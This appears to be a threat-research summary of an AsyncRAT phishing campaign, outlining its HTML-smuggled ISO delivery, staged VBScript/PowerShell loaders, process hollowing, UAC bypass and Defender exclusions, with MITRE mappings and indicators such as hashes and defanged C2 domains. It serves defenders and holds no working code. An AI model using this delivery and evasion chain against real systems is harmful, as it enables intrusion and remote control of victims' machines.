Threat Research

New Threat Campaign: AsyncRAT Introduces a New Delivery Technique

Securonix

Morphisec identifies a new AsyncRAT delivery campaign that uses an HTML attachment to deliver a base64-encoded ISO file, constructed in-browser and mounted to execute staged loaders. The multi-stage chain includes HTML/JavaScript decoding, reflective .NET injection, a dropper, and final payload delivery with evasive techniques, highlighting low detection by many vendors. #AsyncRAT #MovingTargetDefense

Keypoints

  • Campaign uses a phishing email with an HTML attachment to deliver AsyncRAT.
  • The ISO is generated in-browser from a base64 string, not downloaded as a remote file.
  • Stage 1 decodes base64 data via a base64toblob function and window.atob to create an application/octet-stream blob.
  • Stage 2 employs reflective .NET injection with persistence via Schedule Task and runs a dropped VBScript file.
  • Stage 3 dropper (Net.vbs/Net.bat/Net.ps1) downloads and executes the next stage through a PowerShell process.
  • Final payload often hides inside legitimate processes (aspnet_compiler.exe) and uses process hollowing/reflective loading to evade defenses.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The campaign uses an HTML attachment in email to lure victims. “Through a simple email phishing tactic with an html attachment…”
  • [T1027] Obfuscated/Decode Files or Information – The ISO is delivered as a base64 string decoded in-browser. “…base64toblob function gets a Base64 encoded string as an input and is responsible for the decoding to ASCII by a window.atob…”
  • [T1053] Scheduled Task – Persistence via Schedule Task. “Creating persistancy through Schedule Task”
  • [T1059.005] Command and Scripting Interpreter: VBScript – Execution of a dropped .vbs file. “Executing a dropped .vbs file, usually at %ProgramData%”
  • [T1059.001] PowerShell – Loader uses PowerShell to download/execute the next stage. “…downloading and executing the next stage as part of a powershell process execution”
  • [T1055] Process Injection – Injecting the .NET module payload in-memory (dropper). “…Injecting the .NET module payload in-memory(dropper)…”
  • [T1055.012] Process Hollowing – Reflective load and process hollowing. “Reflective load and process hollowing”
  • [T1036] Masquerading – Final AsyncRAT payload hidden inside a legitimate process. “…hiding within the legitimate .NET aspnet_compiler.exe process”
  • [T1548.002] ByPass User Account Control – UAC bypass noted as a defense-evasion step. “…UAC bypass using Disk Cleanup”
  • [T1562.001] Impair Defenses – Defender exclusions and related suppression. “…Windows defender exclusion” and “Disable of action center notifications”

Indicators of Compromise

  • [HTML] HTML artifacts – Receipt-<digits>.html, and 2 more receipts (Receipt-123.html, Receipt-456.html)
  • [Hash] HTML delivery hashes – Fa5f4847181550f1332f943882bc89ab48302a3d6d6efc1a364b2af7dec119b2, 50d308118008908832fe9c7fa78169ef8aaa960450c788a2c41af0eb5e0a62db
  • [Hash] AsyncRAT component hashes – 58BEE75D7A00CA8D8C0E9FBBC8ADA035B82DE90CBACF63F1AC7E1DB0E771AA28, B49F3B8AAE24C6AE2026E86A1D12F2487DD768C1326BFC7E3BB610DB7A0E857B
  • [Domain] C2 domains – Pop11.ddns[.]net:6666, Wthcv.sytes[.]net:7400
  • [Hash] Email-related artifacts – 1241b9486d3d7c74c0bb1f2a7bdd81ff9597b2c92f2af8a5b3819b296c400336, D67bd08e03a5e2054aae8458b0c549cec2f988a9e703d3ed755626d840990a0e

Read more: https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign